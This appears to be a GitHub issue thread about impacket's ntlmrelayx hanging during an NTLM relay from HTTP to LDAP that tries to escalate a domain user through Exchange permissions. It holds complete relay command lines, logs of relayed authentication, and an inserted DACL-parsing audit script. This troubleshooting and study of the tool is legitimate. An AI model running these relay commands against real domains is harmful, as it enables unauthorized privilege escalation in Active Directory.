fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com

ntlmrelayx: HTTP to LDAP just got stuck forever #960

Closed Andrew143413 closed 3 years ago

Andrew143413 commented 3 years ago

Configuration

impacket version: Impacket v0.9.22.dev1+20200924.183326.65cf657f
Python version: Python 2.7.18
Python version: Python 3.8.5
Target OS: Linux rt 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

Hello. I have the following configuration:

  1. Domain: TDOMAIN.XY (censored)
  2. Domain controller: DC01, 10.10.0.1, Windows Server 2012 R2 Standard 6.3 (9600), LDAP Signing Disabled
  3. Exchange server: EXCHANGE-2016-01, 10.1.0.55, Windows Server 2016 Standard 10.0 (14393)
  4. EXCHANGE-2016-01 is a member of "Exchange Trusted Subsystem" group.
  5. "Exchange Trusted Subsystem" is a member of "Exchange Windows Permissions" group.
  6. Attacking host (kali) with both Python 2.7.18 and Python 3.8.5 installed.

ntlmrelayx seems to work (ldapdomaindump successfully creates .json, .grep and .html files) in the beginning, but it is getting stuck after the message "[*] Domain info dumped into lootdir!" whatever I tried ;(

Debug Output With Command String -- Python 2.7.18

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: [DN: CN=Exchange Servers,OU=Security Groups,DC=TDOMAIN,DC=XY - STATUS: Read - READ TIME: 2020-09-25T00:00:00.000001
    name: Exchange Servers
    objectSid: S-1-5-21-1234567890-1234567890-1234567890-12345

--snip--
A lot of stuff here
--snip--
10 minutes later
--snip--

[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

The same thing happens with Python3:

Debug Output With Command String -- Python 3.8.5

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: [DN: CN=Exchange Servers,OU=Security Groups,DC=TDOMAIN,DC=XY - STATUS: Read - READ TIME: 2020-09-25T00:00:00.000001
    name: Exchange Servers
    objectSid: S-1-5-21-1234567890-1234567890-1234567890-12345

--snip--
A lot of stuff here
--snip--
10 minutes later
--snip--

[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

pip2 list

root@rt:~# pip2 list
/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/py2_warn.py:21: UserWarning: Setuptools will stop working on Python 2
************************************************************
You are running Setuptools on Python 2, which is no longer
supported and
>>> SETUPTOOLS WILL STOP WORKING <<<
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
https://bit.ly/setuptools-py2-warning.
************************************************************
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Package                       Version
----------------------------- ------------------------------------
-mpacket                      0.9.22.dev1+20200924.183326.65cf657f
adns-python                   1.2.1
asn1crypto                    0.24.0
atomicwrites                  1.1.5
attrs                         19.3.0
Automat                       0.6.0
backports-abc                 0.5
backports.functools-lru-cache 1.5
BBQSQL                        1.0
bcrypt                        3.1.7
bdfproxy                      0.0.0
beautifulsoup4                4.3.2
BlindElephant                 1.0
blinker                       1.4
certifi                       2019.11.28
chardet                       3.0.4
Click                         7.0
colorama                      0.3.7
ConfigArgParse                0.13.0
configobj                     5.0.6
configparser                  3.5.0b2
constantly                    15.1.0
construct                     2.8.16
contextlib2                   0.5.5
cryptography                  2.6.1
cycler                        0.10.0
dbus-python                   1.2.16
distorm3                      3.4.1
dnspython                     1.16.0
EAPeak                        0.1.8
easygui                       0.96
EditorConfig                  0.12.1
entrypoints                   0.3
enum34                        1.1.6
et-xmlfile                    1.0.1
feedparser                    5.2.1
Flask                         1.1.1
funcsigs                      1.0.2
fuse-python                   1.0.0
future                        0.18.2
futures                       3.3.0
gevent                        1.4.0
greenlet                      0.4.15
h2                            3.0.1
hpack                         3.0.0
html2text                     2019.8.11
html5lib                      1.0.1
httplib2                      0.14.0
hyperframe                    5.2.0
hyperlink                     19.0.0
idna                          2.6
impacket                      0.9.22.dev1+20200924.183326.65cf657f
importlib-metadata            1.5.0
incremental                   16.10.1
ipaddress                     1.0.17
itsdangerous                  0.24
jdcal                         1.0
Jinja2                        2.11.2
jsbeautifier                  1.6.4
jsonpickle                    0.9.5
keepnote                      0.7.8
keyring                       18.0.1
keyrings.alt                  3.2.0
killerbee                     1.0
kiwisolver                    1.0.1
ldap3                         2.5.1
ldapdomaindump                0.9.3
lxml                          4.5.2
M2Crypto                      0.31.0
MarkupSafe                    1.1.1
matplotlib                    2.2.4
mechanize                     0.4.5
metaconfig                    0.1.4a1
more-itertools                4.2.0
msgpack                       0.5.6
mysqlclient                   1.3.10
NfSpy                         1.0
ntdsxtract                    1.3.3.20150928
numpy                         1.16.5
olefile                       0.46
openpyxl                      2.4.9
packaging                     19.1
paramiko                      2.6.0
passlib                       1.7.1
pathlib2                      2.3.5
pcapy                         0.11.4
peepdf                        0.4.2
pefile                        2019.4.18
Pillow                        6.2.1
pip                           20.0.2
pipenv                        2018.11.26
pluggy                        0.13.0
pluginbase                    0.3
psycopg2                      2.8.4
py                            1.8.1
pyasn1                        0.4.8
pyasn1-modules                0.2.1
pycairo                       1.16.2
pycrypto                      2.7a1
pycryptodomex                 3.6.1
pycurl                        7.43.0.2
PyGObject                     3.36.0
pyinotify                     0.9.6
pylibemu                      0.3.3
pylibpcap                     0.6.4
pymssql                       2.1.4
PyNaCl                        1.3.0
PyOpenGL                      3.1.0
pyOpenSSL                     19.0.0
pyparsing                     2.4.2
pyperclip                     1.6.4
PyRIC                         0.1.6
pyrit                         0.5.1
pyscard                       1.9.9
pyserial                      3.4
PySocks                       1.6.8
pysqlite                      2.7.0
pytest                        4.6.9
python-dateutil               2.7.3
python-Levenshtein            0.12.0
pythonaes                     1.0
pytz                          2020.1
pyusb                         1.0.2
PyV8                          1.0.dev0
PyX                           0.12.1
pyxdg                         0.26
qt4reactor                    1.6
rdpy                          1.3.2
requests                      2.22.0
rfidiot                       1.0
rsa                           4.0
scandir                       1.10.0
scapy                         2.4.3
service-identity              18.1.0
setuptools                    44.1.1
simplejson                    3.16.0
singledispatch                3.4.0.3
sip                           4.19.21
six                           1.15.0
soupsieve                     1.9.5
SQLAlchemy                    1.3.12
subprocess32                  3.5.4
tcpwatch                      1.3.1
tornado                       5.1.1
Twisted                       18.9.0
typing                        3.6.6
urllib3                       1.25.6
urwid                         2.0.1
uTidylib                      0.5
virtualenv                    16.4.1
virtualenv-clone              0.5.1
volatility                    2.6
wafw00f                       0.9.4
wcwidth                       0.1.8
webencodings                  0.5.1
webunit                       1.3.10
Werkzeug                      0.16.1
wheel                         0.33.6
wxPython                      3.0.2.0
wxPython-common               3.0.2.0
yara-python                   3.10.0
zenmap                        7.80
zipp                          1.0.0
zope.interface                4.6.0
root@rt:~#

pip3 list

Package                      Version                              Location
---------------------------- ------------------------------------ --------------------------------------
aiodns                       2.0.0
aiohttp                      3.6.2
ajpy                         0.0.4
alembic                      1.4.2.dev0
aniso8601                    8.0.0
apispec                      3.3.1
apispec-webframeworks        0.5.2
async-timeout                3.0.1
attrs                        19.3.0
autobahn                     17.10.1
Automat                      20.2.0
Babel                        2.8.0
backcall                     0.2.0
backdoor-factory             0.0.0
bcrypt                       3.1.7
beautifulsoup4               4.9.1
blinker                      1.4
bottle                       0.12.15
Brlapi                       0.7.0
cairocffi                    0.9.0
capstone                     3.0.5
cbor                         1.0.0
certifi                      2020.6.20
cffi                         1.14.2
Chameleon                    3.6.2
chardet                      3.0.4
chirp                        0.3.0.dev0
chrome-gnome-shell           0.0.0
click                        7.1.2
click-plugins                1.1.1
colorama                     0.4.3
configobj                    5.0.6
constantly                   15.1.0
cryptography                 3.1
cupshelpers                  1.0
Cython                       0.29.21
dbus-python                  1.2.16
decorator                    4.4.2
deprecation                  2.0.7
dhcpig                       0.0.0
dicttoxml                    1.7.4
distro                       1.5.0
distro-info                  0.23
Django                       2.2.16
dnslib                       0.9.14
dnspython                    2.0.0
email-validator              1.1.1
faraday-client               1.0.0
faraday-plugins              1.2
faradaysec                   3.12
feedparser                   5.2.1
filedepot                    0.5.2
filteralchemy                0.1.0
flasgger                     0.9.4
Flask                        1.1.2
Flask-BabelEx                0.9.4
Flask-Classful               0.14.1
Flask-KVSession-fork         0.6.3
Flask-Login                  0.5.0
Flask-Mail                   0.9.1
Flask-Principal              0.4.0
Flask-RESTful                0.3.8
Flask-Restless               0.17.0
Flask-Security-Too           3.4.2
Flask-SQLAlchemy             2.4.0
Flask-WTF                    0.14.3
future                       0.18.2
GeoIP                        1.3.2
geoip2                       2.9.0
gevent                       1.4.0
gpg                          1.14.0-unknown
greenlet                     0.4.15
grequests                    0.4.0
html2text                    2020.1.16
html5lib                     1.0.1
humanize                     2.6.0
hupper                       1.10.2
hyperlink                    19.0.0
idna                         2.10
impacket                     0.9.22.dev1+20200924.183326.65cf657f /usr/local/lib/python3.8/dist-packages
importlib-metadata           1.6.0
incremental                  16.10.1
invoke                       1.4.1
IPy                          1.0
ipython                      7.18.1
ipython-genutils             0.2.0
itsdangerous                 1.1.0
jedi                         0.17.0
Jinja2                       2.11.2
jsonschema                   3.2.0
jupyter-core                 4.6.3
KismetCaptureFreaklabsZigbee 2018.7.0
KismetCaptureRtl433          2019.9.1
KismetCaptureRtladsb         2019.10.1
KismetCaptureRtlamr          2019.10.1
ldap3                        2.8.1
ldapdomaindump               0.9.3
louis                        3.15.0
lxml                         4.5.2
lz4                          3.0.2+dfsg
M2Crypto                     0.36.0
Mako                         1.1.2
Markdown                     3.2.2
MarkupSafe                   1.1.1
marshmallow                  3.7.1
marshmallow-sqlalchemy       0.19.0
maxminddb                    1.4.1
mechanize                    0.4.5
mercurial                    5.5.1
mimerender                   0.6.0
mistune                      0.8.4
more-itertools               4.2.0
multidict                    4.7.6
mysqlclient                  1.4.4
nassl                        3.0.0
nbformat                     5.0.7
netaddr                      0.7.19
nplusone                     1.0.0
numpy                        1.19.1
olefile                      0.46
packaging                    20.4
paramiko                     2.7.2
parso                        0.7.0
passlib                      1.7.2
Paste                        3.4.3
PasteDeploy                  2.1.0
PasteScript                  2.0.2
pbkdf2                       1.3
pefile                       2019.4.18
pem                          20.1.0
pexpect                      4.6.0
pgspecial                    1.11.10
pickleshare                  0.7.5
Pillow                       6.2.1
pip                          20.0.2
plaster                      1.0
plaster-pastedeploy          0.5
plecost                      1.1.2
plotly                       4.9.0
pluginbase                   1.0.0
ply                          3.11
prettytable                  0.7.2
prompt-toolkit               3.0.7
protobuf                     3.12.3
psycopg2                     2.8.5
py-ubjson                    0.14.0
pyasn1                       0.4.8
pyasn1-modules               0.2.1
pycairo                      1.16.2
pycares                      3.1.1
pycparser                    2.20
pycrypto                     2.6.1
pycryptodomex                3.9.8
pycups                       2.0.1
pycurl                       7.43.0.2
pydot                        1.4.1
pyenchant                    2.0.0
Pygments                     2.3.1
PyGObject                    3.36.0
PyHamcrest                   1.9.0
pyinotify                    0.9.6
pymssql                      2.1.4
PyNaCl                       1.4.0
pyOpenSSL                    19.1.0
pyparsing                    2.4.7
pypng                        0.0.20
PyQRCode                     1.2.1
PyQt5                        5.15.0
pyramid                      1.10.4
PyRIC                        0.1.6.4
pyrsistent                   0.15.5
pyserial                     3.4
pysmbc                       1.0.22
pysmi                        0.3.2
pysnmp                       4.4.6
PySocks                      1.6.8
python-apt                   2.1.3
python-dateutil              2.8.1
python-editor                1.0.3
python-magic                 0.4.16
python-magic-ahupp           0.4.13
python-mimeparse             1.6.0
python-snappy                0.5.3
PyTrie                       0.2
pytz                         2020.1
pyxdg                        0.26
PyYAML                       5.3.1
redis                        3.3.11
repoze.lru                   0.7
requests                     2.23.0
requests-toolbelt            0.8.0
retrying                     1.3.3
roguehostapd                 1.1.2
rq                           1.4.0
scapy                        2.4.3
selenium                     4.0.0a1
service-identity             18.1.0
setproctitle                 1.1.10
setuptools                   46.1.3
shodan                       1.23.1
simplejson                   3.17.0
simplekv                     0.13.0
sip                          4.19.24
six                          1.15.0
soupsieve                    2.0.1
speaklater                   1.4
SQLAlchemy                   1.3.18
sqlalchemy-schemadisplay     1.3
sqlparse                     0.3.1
sslyze                       3.0.8
syslog-rfc5424-formatter     1.2.2
tabulate                     0.8.2
Tempita                      0.5.2
termcolor                    1.1.0
terminaltables               3.1.0
texttable                    1.6.2
theHarvester                 3.1.0
tld                          0.11.11
tls-parser                   1.2.2
tornado                      5.1.1
tqdm                         4.48.2
traitlets                    5.0.4
translationstring            1.4
Twisted                      18.9.0
txaio                        20.4.1
typing-extensions            3.7.4.2
u-msgpack-python             2.3.0
unattended-upgrades          0.1
unicodecsv                   0.14.1
Unidecode                    1.1.1
urllib3                      1.25.9
venusian                     3.0.0
vinetto                      0.8.0
wafw00f                      2.1.0
waitress                     1.4.1
wapiti3                      3.0.3
wcwidth                      0.1.9
webargs                      6.1.0
webencodings                 0.5.1
WebOb                        1.8.6
websocket-client             0.57.0
WebTest                      2.0.34
Werkzeug                     1.0.1
wfuzz                        2.4.5
wheel                        0.34.2
wifiphisher                  1.4
wifite                       2.5.5
wsaccel                      0.6.2
WTForms                      2.2.1
wxPython                     4.0.7
xcffib                       0.8.1
XlsxWriter                   1.1.2
yara-python                  3.10.0
yarl                         1.4.2
yaswfp                       0.9.3
zim                          0.73.2
zipp                         1.0.0
zope.component               4.3.0
zope.deprecation             4.4.0
zope.event                   4.4
zope.hookable                5.0.1
zope.interface               5.1.0
root@rt:~#

I'd appreciate any help to point me in the right direction. Thanks in advance.

dirkjanm commented 3 years ago

Attacks to LDAP automatically validate which privileges the relayed user has. It only mentions "create user" privileges, not "modify domain ACL" privileges. So likely your Exchange permissions are not vulnerable. You can also skip the permission detection and always try the ACL attack with --no-validate-privs, if that fails with access denied then you know for sure you don't have the required permissions.

Andrew143413 commented 3 years ago

Thanks for the reply @dirkjanm and thank you for your great work! I was inspired by your blog posts to look more deeply into the security challenges with Active Directory.

I've also tried to run ntlmrelayx as follows:

ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --escalate-user u.regular
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --escalate-user u.regular

but got the same result - ntlmrelayx gets stuck without any error message. I don't have the output of those commands right now, but I'll recheck to ensure that I didn't miss anything.

As regards the "modify domain ACL" privilege, is there a way to check manually whether a machine or any user has it or not? I have domain admin privileges in the dc01.tdomain.xy domain.

Thanks.
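A manual way to answer the question just asked (which principals hold a right that lets them modify the domain object's ACL), added here as an editor's example; it is not Impacket code and not something either participant posted. It parses the nTSecurityDescriptor of the domain root directly: walk the DACL and report the trustees granted WriteDACL, WriteOwner or GenericAll, netting out deny ACEs for the same bits. The security-descriptor layout follows MS-DTYP (self-relative SD, ACL, ACE, SID). Everything in the sample DACL is constructed: the SIDs, the RID 1105 standing in for a group such as "Exchange Windows Permissions", and the 16-byte GUID. `fetch_domain_sd` is an assumed helper that needs the `ldap3` package and an account able to read the DACL; the offline demo does not call it.

```python
import struct

# Access-mask bits that allow rewriting the object's ACL (names and values from MS-DTYP / MS-ADTS).
GENERIC_ALL = 0x10000000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
ACL_MODIFY_MASK = GENERIC_ALL | WRITE_DAC | WRITE_OWNER
GENERIC_READ = 0x80000000
DS_CONTROL_ACCESS = 0x00000100          # extended rights; not an ACL-modify right by itself

ACCESS_ALLOWED, ACCESS_DENIED = 0x00, 0x01
ACCESS_ALLOWED_OBJECT, ACCESS_DENIED_OBJECT = 0x05, 0x06
OBJECT_ACE_TYPES = (ACCESS_ALLOWED_OBJECT, ACCESS_DENIED_OBJECT)
ALLOW_ACE_TYPES = (ACCESS_ALLOWED, ACCESS_ALLOWED_OBJECT)
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000


def sid_to_bytes(sid):
    """Serialise 'S-1-5-21-...' into the binary SID layout: revision, sub-authority count,
    6-byte big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split('-')
    assert parts[0] == 'S' and parts[1] == '1'
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, 'big')
            + b''.join(struct.pack('<I', s) for s in subs))


def bytes_to_sid(data, offset):
    """Parse a binary SID at offset; return (sid_string, bytes_consumed)."""
    revision, count = data[offset], data[offset + 1]
    authority = int.from_bytes(data[offset + 2:offset + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, data, offset + 8)
    return 'S-%d-%d-%s' % (revision, authority, '-'.join(str(s) for s in subs)), 8 + 4 * count


def build_ace(ace_type, mask, sid, object_type=None):
    """Build one ACE (plain or object ACE). object_type is an optional 16-byte GUID."""
    body = struct.pack('<I', mask)
    if ace_type in OBJECT_ACE_TYPES:
        body += struct.pack('<I', 1 if object_type else 0)   # ACE_OBJECT_TYPE_PRESENT
        body += object_type or b''
    body += sid_to_bytes(sid)
    return struct.pack('<BBH', ace_type, 0, 4 + len(body)) + body


def build_sd(aces):
    """Build a minimal self-relative security descriptor carrying only a DACL (owner/group omitted)."""
    acl_body = b''.join(aces)
    acl = struct.pack('<BBHHH', 4, 0, 8 + len(acl_body), len(aces), 0) + acl_body   # ACL_REVISION_DS
    header = struct.pack('<BBHIIII', 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


# Constructed sample DACL (not from any real domain). Deny ACEs first, as in canonical order.
CONSTRUCTED_GUID = bytes(range(16))
SAMPLE_SD = build_sd([
    build_ace(ACCESS_DENIED, WRITE_DAC | WRITE_OWNER, 'S-1-5-21-1000-2000-3000-1107'),
    build_ace(ACCESS_ALLOWED, GENERIC_ALL, 'S-1-5-21-1000-2000-3000-512'),      # Domain Admins-style RID
    build_ace(ACCESS_ALLOWED, WRITE_DAC, 'S-1-5-21-1000-2000-3000-1105'),       # hypothetical Exchange group
    build_ace(ACCESS_ALLOWED_OBJECT, DS_CONTROL_ACCESS, 'S-1-5-21-1000-2000-3000-1106', CONSTRUCTED_GUID),
    build_ace(ACCESS_ALLOWED, WRITE_DAC, 'S-1-5-21-1000-2000-3000-1107'),       # cancelled by the deny above
    build_ace(ACCESS_ALLOWED, GENERIC_READ, 'S-1-5-11'),                        # Authenticated Users, read only
])


def parse_dacl_aces(sd):
    """Walk the DACL of a self-relative SD and return a list of (ace_type, mask, trustee_sid)."""
    _rev, _sbz1, control, _own, _grp, _sacl, dacl_off = struct.unpack_from('<BBHIIII', sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []                       # NULL DACL: no ACEs to list (and everyone has full access)
    _arev, _asbz, _asize, ace_count, _sbz2 = struct.unpack_from('<BBHHH', sd, dacl_off)
    pos, aces = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from('<BBH', sd, pos)
        body = pos + 4
        mask = struct.unpack_from('<I', sd, body)[0]
        body += 4
        if ace_type in OBJECT_ACE_TYPES:
            obj_flags = struct.unpack_from('<I', sd, body)[0]
            body += 4 + 16 * bool(obj_flags & 0x1) + 16 * bool(obj_flags & 0x2)   # skip optional GUIDs
        if ace_type in ALLOW_ACE_TYPES + (ACCESS_DENIED, ACCESS_DENIED_OBJECT):
            aces.append((ace_type, mask, bytes_to_sid(sd, body)[0]))
        pos += ace_size                 # other ACE types are skipped by size
    return aces


def find_acl_modifiers(sd):
    """SIDs granted WriteDACL/WriteOwner/GenericAll whose bits are not all taken away by a deny ACE.
    Generic bits are not expanded onto specific rights, and group membership is not resolved."""
    grants, denies = {}, {}
    for ace_type, mask, sid in parse_dacl_aces(sd):
        bits = mask & ACL_MODIFY_MASK
        if bits:
            bucket = grants if ace_type in ALLOW_ACE_TYPES else denies
            bucket[sid] = bucket.get(sid, 0) | bits
    return sorted(sid for sid, bits in grants.items() if bits & ~denies.get(sid, 0))


def fetch_domain_sd(dc_host, user, password, base_dn):
    """Assumed helper: read the domain root's nTSecurityDescriptor with ldap3 (not run offline).
    sdflags=0x04 requests the DACL only, which a normal domain account may read."""
    from ldap3 import Server, Connection, NTLM
    from ldap3.protocol.microsoft import security_descriptor_control
    conn = Connection(Server(dc_host), user=user, password=password, authentication=NTLM, auto_bind=True)
    conn.search(base_dn, '(objectClass=domain)', attributes=['nTSecurityDescriptor'],
                controls=security_descriptor_control(sdflags=0x04))
    entry = next(r for r in conn.response if r['type'] == 'searchResEntry')
    return entry['raw_attributes']['nTSecurityDescriptor'][0]


if __name__ == '__main__':
    for sid in find_acl_modifiers(SAMPLE_SD):
        print('can modify domain ACL:', sid)
```

The returned SIDs are the trustees named on the ACEs, so a machine account such as the one relayed in this thread appears only indirectly: compare the list against the account's group memberships (for a live check, its tokenGroups attribute), not just its own SID.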

Andrew143413 commented 3 years ago

The problem was indeed caused by a lack of access rights:

ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-validate-privs --escalate-user u.regular -debug
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against dap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[+] Performing ACL attack
[+] Found sid for user U.Regular: S-1-5-21-1234567890-1234567890-1234567890-123456
[*] Querying domain security descriptor
[-] Error when updating ACL: {'dn': u'', 'referrals': None, 'description': 'insufficientAccessRights', 'result': 50, 'message': u'00000005: SecErr: DSID-03152612, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'type': 'modifyResponse'}

Thanks to everyone who made such a great library for us!